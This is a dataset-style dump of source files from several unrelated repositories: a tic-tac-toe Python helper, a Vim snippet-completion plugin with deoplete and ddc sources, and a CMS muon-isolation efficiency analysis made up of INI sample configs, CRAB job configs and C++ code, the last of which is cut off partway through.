x in range(3):\n # horizontal win\n if self.grid[x][0] != 0 and self.grid[x][0] == self.grid[x][1] == self.grid[x][2]:\n return True \n # vertical win\n if self.grid[0][x] != 0 and self.grid[0][x] == self.grid[1][x] == self.grid[2][x]:\n return True\n # left / right diagonal win\n if self.grid[1][1] != 0:\n # left -> right diagonal win\n if self.grid[0][0] == self.grid[1][1] == self.grid[2][2]:\n return True\n # right -> left diagonal win\n if self.grid[0][2] == self.grid[1][1] == self.grid[2][0]:\n return True\n\n def makeMove(self, coord, playerID):\n r, c = coordToRowCol(coord)\n if self.grid[r][c] != 0:\n raise ValueError(\"Tried to erase someone's move\")\n self.grid[r][c] = playerID\n \n def encoding(self):\n encoding = 0\n for r in range(3):\n for c in range(3):\n exponent = 3 * r + c\n encoding += self.grid[r][c] * (3 ** exponent)\n return encoding" }, { "alpha_fraction": 0.7416666746139526, "alphanum_fraction": 0.75, "avg_line_length": 29.125, "blob_id": "ce9704999cc79ec0b18a72a282d4d98ec1f42381", "content_id": "a1105f0c3f0ced980c2abe2996220856e676c730", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 240, "license_type": "no_license", "max_line_length": 58, "num_lines": 8, "path": "/util.py", "repo_name": "nikolaimerritt/NoughtsAndCrossesML", "src_encoding": "UTF-8", "text": "def before(superstring, bit):\n return superstring.split(bit)[0]\n\ndef after(superstring, bit):\n return superstring.split(bit)[1]\n\ndef between(superstring, firstBit, secondBit):\n return after(before(superstring, secondBit), firstBit)" } ]
7
gamoutatsumi/vim-vsnip-integ
https://github.com/gamoutatsumi/vim-vsnip-integ
9d97e9abf437d17bde56c352d306f79daf9029bf
0eee427f96aa11dec031adc104e218775bafc172
a0d74d7ce866a95f8877e50babc0246fef08c2e3
refs/heads/master
2023-08-13T20:19:14.059566
2021-10-02T10:06:44
2021-10-02T10:06:44
414,115,982
0
0
MIT
2021-10-06T07:40:55
2021-10-02T10:06:51
2021-10-02T10:06:48
null
[ { "alpha_fraction": 0.568129301071167, "alphanum_fraction": 0.5796766877174377, "avg_line_length": 26, "blob_id": "c82d584719e8b4d77b3ebd898096bfbb2e6d3688", "content_id": "d173d5f35aff43d282808d51dc0998ed014eb890", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 433, "license_type": "permissive", "max_line_length": 74, "num_lines": 16, "path": "/rplugin/python3/deoplete/source/vsnip.py", "repo_name": "gamoutatsumi/vim-vsnip-integ", "src_encoding": "UTF-8", "text": "import json\nfrom deoplete.source.base import Base\n\nclass Source(Base):\n def __init__(self, vim):\n Base.__init__(self, vim)\n\n self.name = 'vsnip'\n self.mark = '[vsnip]'\n self.rank = 1000\n self.input_pattern = r'\\w\\+$'\n self.min_pattern_length = 1\n self.vars = {}\n\n def gather_candidates(self, context):\n return self.vim.call('vsnip#get_complete_items', context['bufnr'])\n\n" }, { "alpha_fraction": 0.6233009696006775, "alphanum_fraction": 0.6388349533081055, "avg_line_length": 22.409090042114258, "blob_id": "9c2d072f9e7d4c1c8690e5d20b8e814b6e2d10da", "content_id": "48f153b1719911fb38c78ae84f13645a384ceb7d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "TypeScript", "length_bytes": 515, "license_type": "permissive", "max_line_length": 75, "num_lines": 22, "path": "/denops/@ddc-sources/vsnip.ts", "repo_name": "gamoutatsumi/vim-vsnip-integ", "src_encoding": "UTF-8", "text": "import {\n BaseSource,\n Candidate,\n} from \"https://deno.land/x/[email protected]/types.ts#^\";\nimport { Denops, fn } from \"https://deno.land/x/[email protected]/deps.ts#^\";\n\ntype Params = Record<string, never>;\n\nexport class Source extends BaseSource<Params> {\n async gatherCandidates(args: {\n denops: Denops;\n }): Promise<Candidate[]> {\n return args.denops.call(\n \"vsnip#get_complete_items\",\n await fn.bufnr(args.denops),\n ) as Promise<Candidate[]>;\n }\n\n params(): Params {\n return {};\n }\n}\n" }, { "alpha_fraction": 0.7348721027374268, "alphanum_fraction": 0.7423580884933472, "avg_line_length": 26.63793182373047, "blob_id": "056da56f5b50d7bb0e37a8cbca33e5c3b805691a", "content_id": "d098aaeb2e21b510e2af9b0b6ad75aa1c037e27d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1603, "license_type": "permissive", "max_line_length": 102, "num_lines": 58, "path": "/README.md", "repo_name": "gamoutatsumi/vim-vsnip-integ", "src_encoding": "UTF-8", "text": "# vim-vsnip-integ\n\nThis plugin provides some plugins integration.\n\n- Snippet completion\n- Snippet expansion\n\n\n# Requirements\n\n- [vim-vsnip](https://github.com/hrsh7th/vim-vsnip)\n\t- You should set [mapping](https://github.com/hrsh7th/vim-vsnip/blob/master/README.md#2-settingread).\n\n\n# Integrations\n\n### LSP\n\n#### [vim-lsp](https://github.com/prabirshrestha/vim-lsp)\n- Support snippet text expansion.\n\n#### [vim-lsc](https://github.com/natebosch/vim-lsc)\n- Support snippet text expansion.\n\n#### [vim-lamp](https://github.com/hrsh7th/vim-lamp)\n- Support snippet text expansion.\n\n#### [LanguageClient-neovim](https://github.com/autozimu/LanguageClient-neovim)\n- Support snippet text expansion.\n\n#### [nvim builtin-lsp omnifunc](https://github.com/neovim/neovim)\n- Support snippet text expansion.\n- Support textEdit/additionalTextEdits at CompleteDone.\n\n#### [deoplete-lsp x nvim builtin-lsp](https://github.com/Shougo/deoplete-lsp)\n- Support snippet text expansion.\n- Support textEdit/additionalTextEdits at CompleteDone.\n\n#### [completion-nvim x nvim builtin-lsp](https://github.com/haorenW1025/completion-nvim)\n- Support snippet text expansion.\n\n\n### Completion\n\n#### [deoplete.nvim](https://github.com/Shougo/deoplete.nvim)\n- Snippet completion.\n\n#### [asyncomplete.vim](https://github.com/prabirshrestha/asyncomplete.vim)\n- Snippet completion.\n\n#### [vim-mucomplete](https://github.com/lifepillar/vim-mucomplete)\n- Snippet completion.\n\n#### [completion-nvim](https://github.com/haorenW1025/completion-nvim)\n- Snippet completion.\n\n#### [ddc.vim](https://github.com/Shougo/ddc.vim)\n- Snippet completion.\n" } ]
3
brochero/MuonPOGtreeProducer
https://github.com/brochero/MuonPOGtreeProducer
2b8ca106e19638a963b794363c1cc636f6ca7612
58eb81eb6b8aba01058ce7ca64b0eb5670bd7a21
7a36bdbe9bbfa411b28f34ee00dab3a13c0a3076
refs/heads/Iso17
2020-04-06T04:09:32.860076
2018-11-02T12:24:37
2018-11-02T12:24:37
83,030,804
0
0
null
2017-02-24T10:34:52
2017-02-24T10:34:54
2017-10-18T15:27:30
C++
[ { "alpha_fraction": 0.6418604850769043, "alphanum_fraction": 0.7720929980278015, "avg_line_length": 19.428571701049805, "blob_id": "a0357f6275e2e5eea70f25df4bd33ab01c47e1b9", "content_id": "4a820fc699f7c28383785c3661a4a79e547d7a51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 430, "license_type": "no_license", "max_line_length": 142, "num_lines": 21, "path": "/Tools/efficiencies/config/configQCD_pT1000toInf.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-1000toInf_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 1.621 \n;(10.4305*0.15544);\nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" }, { "alpha_fraction": 0.6348837018013, "alphanum_fraction": 0.7767441868782043, "avg_line_length": 19.428571701049805, "blob_id": "25f1505081689e247c785ffd5c425562680ac4e7", "content_id": "7594a1406e55e06310ee277ae8bb16f5bd488794", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 430, "license_type": "no_license", "max_line_length": 139, "num_lines": 21, "path": "/Tools/efficiencies/config/configQCD_pT15to20.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-15to20_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 3819570. \n;(1273190000*0.003)\nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" }, { "alpha_fraction": 0.6348837018013, "alphanum_fraction": 0.7744185924530029, "avg_line_length": 19.428571701049805, "blob_id": "bc0da829b036b7c82bef9851c1ff586fe96433fd", "content_id": "8037090faaf7a854a679c13949549878c468b7ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 430, "license_type": "no_license", "max_line_length": 141, "num_lines": 21, "path": "/Tools/efficiencies/config/configQCD_pT170to300.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-170to300_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 8654.49\n;(117989*0.07335); \nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" }, { "alpha_fraction": 0.6363636255264282, "alphanum_fraction": 0.7762237787246704, "avg_line_length": 19.380952835083008, "blob_id": "015d8b1806a1d54cc7dd3247e4372fb75c5d5082", "content_id": "bd434a90ead82c8f7a81b6c66d56a0251ce19c39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 429, "license_type": "no_license", "max_line_length": 140, "num_lines": 21, "path": "/Tools/efficiencies/config/configQCD_pT80to120.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-80to120_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 106034.\n;(2758420*0.03844);\nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" }, { "alpha_fraction": 0.6334106922149658, "alphanum_fraction": 0.7772621512413025, "avg_line_length": 19.4761905670166, "blob_id": "a969f00dd8ea04245fdabcd68fd20e76f7a22e8e", "content_id": "d6d520f24f00df22e518ace76d785fe19c5efbc4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 431, "license_type": "no_license", "max_line_length": 139, "num_lines": 21, "path": "/Tools/efficiencies/config/configQCD_pT30to50.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-30to50_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 1652470.\t\n;(139803000*0.01182)\nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" }, { "alpha_fraction": 0.6348837018013, "alphanum_fraction": 0.7720929980278015, "avg_line_length": 19.428571701049805, "blob_id": "935c473a7b0d1a12960207546b5c2dfefbb42234", "content_id": "6d929e0165ffe06e9b358e5d85aa36537ee5eeb6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 430, "license_type": "no_license", "max_line_length": 142, "num_lines": 21, "path": "/Tools/efficiencies/config/configQCD_pT800to1000.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-800to1000_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 4.707\n;(32.3486*0.14552);\nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" }, { "alpha_fraction": 0.6444300413131714, "alphanum_fraction": 0.6949481964111328, "avg_line_length": 44.382354736328125, "blob_id": "45db66a9cde609a20ed04f85e353afa3660c0b2e", "content_id": "7cda1bd26e85b9509bb748db5c11064794bb3a1e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1544, "license_type": "no_license", "max_line_length": 156, "num_lines": 34, "path": "/Tools/test/crab/crabIsoDY_cfg.py", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "from WMCore.Configuration import Configuration\nconfig = Configuration()\n\nconfig.section_('General')\nconfig.General.transferLogs = True\nconfig.General.requestName = 'DYJetsToLL_madgraphMLMRunIIFall18-102X_upgrade2018'\n#config.General.requestName = 'DYJetsToLL_madgraphMLMRunIIFall18-102X_upgrade2018FlatPU0to70'\n\nconfig.section_('JobType')\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = '../muonPogNtuples_miniAOD_cfg.py'\nconfig.JobType.pyCfgParams = ['globalTag=102X_upgrade2018_realistic_v10',\n 'ntupleName=muonPOGNtuple_IsolationStudies18_DY.root',\n 'nEvents=-1',\n 'runOnMC=True',\n 'hltPathFilter=all',\n 'minMuPt=5.0',\n 'minNMu=1'\n ]\nconfig.JobType.allowUndistributedCMSSW = True # To fix cmssw releases\n\nconfig.section_('Data')\nconfig.Data.inputDataset = '/DYJetsToLL_M-50_TuneCP5_13TeV-madgraphMLM-pythia8/RunIIFall18MiniAOD-102X_upgrade2018_realistic_v12_ext1-v1/MINIAODSIM'\n#config.Data.inputDataset = '/DYJetsToLL_M-50_TuneCP5_13TeV-madgraphMLM-pythia8/RunIIFall18MiniAOD-FlatPU0to70_102X_upgrade2018_realistic_v12-v1/MINIAODSIM'\n\n\nconfig.Data.splitting = 'FileBased'\nconfig.Data.unitsPerJob = 1\nconfig.Data.inputDBS = 'https://cmsweb.cern.ch/dbs/prod/global/DBSReader/'\n# config.Data.ignoreLocality = True\nconfig.Data.allowNonValidInputDataset = True\n\nconfig.section_('Site')\nconfig.Site.storageSite = 'T2_CH_CERN'\n\n" }, { "alpha_fraction": 0.6286126971244812, "alphanum_fraction": 0.6654624342918396, "avg_line_length": 40.93939208984375, "blob_id": "bc9594b4e938dcd2c80d90cb6cd987f82eb8432e", "content_id": "9056eed7fc283b8367e09a4c2f537131144e9f35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1384, "license_type": "no_license", "max_line_length": 147, "num_lines": 33, "path": "/Tools/test/crab/crabIsoQCD_cfg.py", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "from WMCore.Configuration import Configuration\nconfig = Configuration()\n\nconfig.section_('General')\nconfig.General.transferLogs = True\nconfig.General.requestName = 'QCD_RunIISpring18MiniAOD-100X_upgrade2018_realistic_v10-v1_OnlyTree'\n\nconfig.section_('JobType')\nconfig.JobType.pluginName = 'Analysis'\nconfig.JobType.psetName = '../muonPogNtuples_miniAOD_cfg.py'\nconfig.JobType.pyCfgParams = ['globalTag=100X_upgrade2018_realistic_v10',\n 'ntupleName=muonPOGNtuple_IsolationStudies18_DY.root',\n 'nEvents=-1',\n 'runOnMC=True',\n 'hltPathFilter=all',\n 'minMuPt=5.0',\n 'minNMu=1'\n ]\nconfig.JobType.allowUndistributedCMSSW = True # To fix cmssw releases\n\nconfig.section_('Data')\nconfig.Data.inputDataset = '/QCD_Pt-20toInf_MuEnrichedPt15_TuneCP5_13TeV_pythia8/RunIISpring18MiniAOD-100X_upgrade2018_realistic_v10-v1/MINIAODSIM'\n\nconfig.Data.splitting = 'FileBased'\nconfig.Data.unitsPerJob = 1\nconfig.Data.inputDBS = 'https://cmsweb.cern.ch/dbs/prod/global/DBSReader/'\n# config.Data.ignoreLocality = True\nconfig.Data.allowNonValidInputDataset = True\n\nconfig.section_('Site')\nconfig.Site.storageSite = 'T2_CH_CERN'\n#config.Site.blacklist = ['T2_US_*']\n#config.Site.whitelist = ['T2_IT_Bari']\n" }, { "alpha_fraction": 0.594989001750946, "alphanum_fraction": 0.6118699908256531, "avg_line_length": 41.31296920776367, "blob_id": "bf8536be86b2ab7d04d3803b77ad5dcaef1b5519", "content_id": "840322a58a8004c6a17a03cbd56fdffd4c210852", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 45021, "license_type": "no_license", "max_line_length": 233, "num_lines": 1064, "path": "/Tools/efficiencies/ISOEfficiency.C", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "#include \"TROOT.h\"\n#include \"TRint.h\"\n#include \"TStyle.h\"\n#include \"TFile.h\"\n#include \"TCanvas.h\"\n#include \"TLine.h\"\n#include \"TH1.h\"\n#include \"TH2.h\"\n#include \"TH1D.h\"\n#include \"TH2D.h\"\n#include \"TProfile.h\"\n#include \"TEfficiency.h\"\n#include \"TGraphAsymmErrors.h\"\n#include \"THStack.h\"\n#include \"TLegend.h\"\n#include \"TRegexp.h\"\n#include \"TTree.h\"\n#include \"TBranch.h\"\n#include \"TLorentzVector.h\"\n\n#include \"../src/MuonPogTree.h\"\n#include \"../src/Utils.h\"\n#include \"tdrstyle.C\"\n\n#include <cstdlib>\n#include <iostream>\n#include <algorithm>\n#include <sstream>\n#include <iostream>\n#include <fstream> \n#include <vector>\n#include <regex>\n#include <map>\n\n#include <boost/filesystem.hpp>\n#include <boost/property_tree/ptree.hpp>\n#include <boost/property_tree/ini_parser.hpp>\n#include <boost/property_tree/exceptions.hpp>\n#include <boost/lexical_cast.hpp>\n\n#include <TError.h>\n\n// Helper classes defintion *****\n// 1. SampleConfig : configuration class containing sample information\n// 2. TagAndProbeConfig : configuration class containing TnP cuts information\n// 3. Plotter : class containing the plot definition and defining the plot filling \n// for a given sample <= CB modify this to add new variables\n// ******************************\nstd::vector<TString> GetListOfFiles(TString FileName);\n\nnamespace muon_pog {\n \n class SampleConfig {\n\n public :\n\n // config parameters (public for direct access)\n\n TString fileName; \n TString sampleName; \n Float_t QCDWeight;\n Float_t nEvents;\n Bool_t applyReweighting;\n std::vector<int> runs;\n \n SampleConfig() {};\n \n#ifndef __MAKECINT__ // CB CINT doesn't like boost :'-( \n SampleConfig(boost::property_tree::ptree::value_type & vt); \n#endif\n\n ~SampleConfig() {};\n\n private:\n std::vector<int> toArray(const std::string & entries); \n \n };\n\n class TagAndProbeConfig {\n\n public :\n \n // config parameters (public for direct access)\n \n Float_t gen_DrCut;\n \n Float_t probe_minPt;\n Float_t iso_DeltaBeta; \n Float_t iso_LooseWP, iso_TightWP;\n Float_t isoPUPPI_LooseWP, isoPUPPI_TightWP, isoPUPPILep_LooseWP, isoPUPPILep_TightWP, isoPUPPINoLep_LooseWP, isoPUPPINoLep_TightWP;\n Float_t Miniiso_LooseWP, Miniiso_TightWP; \n Float_t IDMedium_CutdXY, IDMedium_CutdZ;\n \n TagAndProbeConfig() {};\n \n#ifndef __MAKECINT__ // CB CINT doesn't like boost :'-( \n TagAndProbeConfig(boost::property_tree::ptree::value_type & vt); \n#endif\n\n ~TagAndProbeConfig() {};\n \n private:\n std::vector<TString> toArray(const std::string & entries); \n \n };\n\n\n class Plotter {\n\n public :\n \n std::vector<TString> IDName = {\"GLB\", \"TRK\", \"LOOSE\", \"MEDIUM\", \"TIGHT\", \"SOFT\", \"HIGHpT\", \"MEDIUMPrompt\",\n\t\t\t\t \"MVALOOSE\", \"MVAMEDIUM\", \"MVATIGHT\"};\n enum BinType {GLB=0, TRK, LOOSE, MEDIUM, TIGHT, SOFT, HIGHpT, MEDIUMPrompt,\n\t\t MVALOOSE, MVAMEDIUM, MVATIGHT};\n\n std::vector<TString> region = {\"Full\", \"Barrel\", \"Endcap\", \"Overlap\"};\n enum BinRegion {Full=0, Barrel, Endcap, Overlap};\n \n std::vector<TString> IsoName = {\"ISOPF\",\"ISOPUPPI\",\"ISOPUPPILep\",\"ISOPUPPINoLep\",\"MiniISO\"};\n enum BinIsoName {ISOPF=0,ISOPUPPI,ISOPUPPILep,ISOPUPPINoLep,MiniISO};\n \n std::vector< std::vector<TString> > isowp = {{\"ISONoCut\", \"ISOLoose\", \"ISOTight\"},\n\t\t\t\t\t\t {\"PUPPILoose\",\"PUPPITight\"},\n\t\t\t\t\t\t {\"PUPPILepLoose\",\"PUPPILepTight\"},\n\t\t\t\t\t\t {\"PUPPINoLepLoose\",\"PUPPINoLepTight\"},\n\t\t\t\t\t\t {\"MiniISOLoose\",\"MiniISOTight\"}};\n \n std::vector<TString> PUr = {\"FullPU\", \"LowPU\", \"MediumPU\", \"HighPU\"}; \n enum BinPUr{FullPU=0, LowPU, MediumPU, HighPU};\n\n std::vector<TString> pTr = {\"FullpT\", \"LowpT\", \"MediumpT\", \"HighpT\"}; \n enum BinpTr{FullpT=0, LowpT, MediumpT, HighpT};\n \n \n Plotter(muon_pog::TagAndProbeConfig tnpConfig, muon_pog::SampleConfig & sampleConfig) :\n m_tnpConfig(tnpConfig) , m_sampleConfig(sampleConfig) {};\n ~Plotter() {};\n \n void book(TFile *outFile);\n void fill(const std::vector<muon_pog::Muon> & muons, const muon_pog::HLT & hlt, const muon_pog::Event & ev, float weight);\n void fillGen(const std::vector<muon_pog::GenParticle> & genpars, const muon_pog::Event & ev);\n\n std::map<TString, TH1D *> m_plots;\n std::map<TString, TH2D *> m_2Dplots;\n std::map<TString, TProfile *> m_prof;\n std::map<TString, TEfficiency *> m_effs;\n\n std::map<TString, TH2D *> m_2Dyields;\n\n TagAndProbeConfig m_tnpConfig;\n SampleConfig m_sampleConfig;\n \n };\n \n}\n\n// Helper classes defintion *****\n// 1. parseConfig : parse the full cfg file\n// 1. comparisonPlot : make a plot overlayng data and MC for a given plot\n// ******************************\n\nnamespace muon_pog {\n void parseConfig(const std::string configFile, TagAndProbeConfig & tpConfig,\n\t\t std::vector<SampleConfig> & sampleConfigs);\n \n void comparisonPlots(std::vector<Plotter> & plotters,\n\t\t TFile *outFile, TString & outputDir);\n\n void print_progress(int TreeEntries, Long64_t ievt);\n void copyPhp(const TString & outputDir);\n Bool_t IsMediumHIP(const muon_pog::Muon & muon);\n Bool_t IsSoftHIP (const muon_pog::Muon & muon);\n // void setTProfY(TProfile &prof1, TProfile &prof2);\n}\n\n\n\n// The main program******** *****\n// 1. Get configuration file and produces configurations\n// 2. Create Plotters and loop on the event to fill them\n// 3. Writes results in cnfigurable outuput file\n// ******************************\n\nint main(int argc, char* argv[]){\n using namespace muon_pog;\n\n gErrorIgnoreLevel=kError;\n\n\n if (argc != 4) \n {\n std::cout << \"Usage : \"\n\t\t<< argv[0] << \" PATH_TO_CONFIG_FILE PATH_TO_OUTPUT_DIR OUTPUT_FILE_NAME\\n\";\n exit(100);\n }\n\n std::string configFile(argv[1]);\n \n std::cout << \"[\" << argv[0] << \"] Using config file \" << configFile << std::endl;\n\n // Output directory\n TString dirName = argv[2];\n TString outputName = argv[3];\n system(\"mkdir -p \" + dirName);\n TFile* outputFile = TFile::Open(dirName + \"/histos_\" + outputName + \".root\",\"RECREATE\"); // CB find a better name for output file \n\n // Set it to kTRUE if you do not run interactively\n gROOT->SetBatch(kTRUE); \n\n // Initialize Root application\n TRint* app = new TRint(\"CMS Root Application\", &argc, argv);\n\n setTDRStyle();\n \n TagAndProbeConfig tnpConfig;\n std::vector<SampleConfig> sampleConfigs;\n \n parseConfig(configFile,tnpConfig,sampleConfigs);\n\n std::vector<Plotter> plotters;\n\n for (auto sampleConfig : sampleConfigs)\n {\n\n Plotter plotter(tnpConfig, sampleConfig);\n plotter.book(outputFile);\n \n plotters.push_back(plotter);\n }\n \n for (auto plotter : plotters)\n {\n\n\n TString fileListName = plotter.m_sampleConfig.fileName;\n std::cout << \"[\" << argv[0] << \"] Processing file \"\n\t\t<< fileListName.Data() << std::endl; \n\n std::vector<TString> SetOfFiles = GetListOfFiles(fileListName);\n \n std::cout << \"Number of files to be processed: \" << SetOfFiles.size() << std::endl;\n \n // Initialize pointers to summary and full event structure\n muon_pog::Event* ev = new muon_pog::Event();\n\n // Loop over all files\n for(unsigned int ifile = 0; ifile < SetOfFiles.size(); ifile++){\n\t\n\tTFile* inputFile; \n\tTTree* tree;\n\tTBranch* evBranch;\n\t\n\t// Open file, get tree, set branches\n\tinputFile = TFile::Open(SetOfFiles.at(ifile),\"READONLY\");\n\ttree = (TTree*)inputFile->Get(\"MUONPOGTREE\");\n\tif (!tree) inputFile->GetObject(\"MuonPogTree/MUONPOGTREE\",tree);\n\t\n\tevBranch = tree->GetBranch(\"event\");\n\tevBranch->SetAddress(&ev);\n\t\n\t// Watch number of entries\n\tint nEntries;\n\tif (plotter.m_sampleConfig.nEvents > 0 && \n\t plotter.m_sampleConfig.nEvents < tree->GetEntriesFast()) nEntries = plotter.m_sampleConfig.nEvents;\n\telse nEntries = tree->GetEntriesFast();\n\t\n\tstd::cout << \"[\" << argv[0] << \"] Number of entries/sample = \" << nEntries << std::endl;\n\t\n\tint nFilteredEvents = 0;\n\t\n\tfloat weight = 1.;\n\t// Add cross section weight -> To take into account QCD filter efficiencies\n\tif(plotter.m_sampleConfig.applyReweighting==true)\n\t weight *= (plotter.m_sampleConfig.QCDWeight/nEntries);\n \n\tstd::cout << \"Weight per event = \" << weight << std::endl;\t\n\t\n\tfor (Long64_t iEvent=0; iEvent<nEntries; ++iEvent) {\n\t if (tree->LoadTree(iEvent)<0) break;\n\t\n\t print_progress(nEntries, iEvent);\n\t \n\t evBranch->GetEntry(iEvent);\n\n\t plotter.fill(ev->muons, ev->hlt, (*ev), weight);\n\t\n\t plotter.fillGen(ev->genParticles, (*ev));\n\t}\n \n\tstd::cout << \"[==================================================] 100% \" << std::endl;\n\t\n\tdelete tree;\n\tinputFile->Close();\n\tdelete inputFile;\n } // for(ifiles)\n \n delete ev;\n std::cout << std::endl;\n \n }\n \n muon_pog::comparisonPlots(plotters,outputFile,dirName);\n muon_pog::copyPhp(dirName);\n \n outputFile->Write();\n \n if (!gROOT->IsBatch()) app->Run();\n\n return 0;\n\n}\n\n\nmuon_pog::TagAndProbeConfig::TagAndProbeConfig(boost::property_tree::ptree::value_type & vt)\n{\n\n try\n {\n\n gen_DrCut = vt.second.get<Float_t>(\"gen_DrCut\");\n \n iso_DeltaBeta = vt.second.get<Float_t>(\"iso_DeltaBeta\");\n\n iso_LooseWP = vt.second.get<Float_t>(\"iso_LooseWP\");\n iso_TightWP = vt.second.get<Float_t>(\"iso_TightWP\");\n isoPUPPI_LooseWP = vt.second.get<Float_t>(\"isoPUPPI_LooseWP\");\n isoPUPPI_TightWP = vt.second.get<Float_t>(\"isoPUPPI_TightWP\");\n isoPUPPILep_LooseWP = vt.second.get<Float_t>(\"isoPUPPILep_LooseWP\");\n isoPUPPILep_TightWP = vt.second.get<Float_t>(\"isoPUPPILep_TightWP\");\n isoPUPPINoLep_LooseWP = vt.second.get<Float_t>(\"isoPUPPINoLep_LooseWP\");\n isoPUPPINoLep_TightWP = vt.second.get<Float_t>(\"isoPUPPINoLep_TightWP\");\n Miniiso_LooseWP = vt.second.get<Float_t>(\"Miniiso_LooseWP\");\n Miniiso_TightWP = vt.second.get<Float_t>(\"Miniiso_TightWP\");\n\n IDMedium_CutdXY = vt.second.get<Float_t>(\"IDMedium_CutdXY\");\n IDMedium_CutdZ = vt.second.get<Float_t>(\"IDMedium_CutdZ\");\n\n probe_minPt = vt.second.get<Float_t>(\"probe_minPt\");\n\n }\n\n catch (boost::property_tree::ptree_bad_data bd)\n {\n std::cout << \"[TagAndProbeConfig] Can't get data : has error : \"\n\t\t<< bd.what() << std::endl;\n throw std::runtime_error(\"Bad INI variables\");\n }\n\n}\n\nmuon_pog::SampleConfig::SampleConfig(boost::property_tree::ptree::value_type & vt)\n{\n \n try\n {\n fileName = TString(vt.second.get<std::string>(\"fileName\").c_str());\n sampleName = TString(vt.first.c_str());\n QCDWeight = vt.second.get<Float_t>(\"QCDWeight\");\n nEvents = vt.second.get<Float_t>(\"nEvents\"); //CB do we really need this? can't we take nEvents from the file itself?\n applyReweighting = vt.second.get<Bool_t>(\"applyReweighting\");\n runs = toArray(vt.second.get<std::string>(\"runs\"));\n }\n \n catch (boost::property_tree::ptree_bad_data bd)\n {\n std::cout << \"[TagAndProbeConfig] Can't get data : has error : \"\n\t\t<< 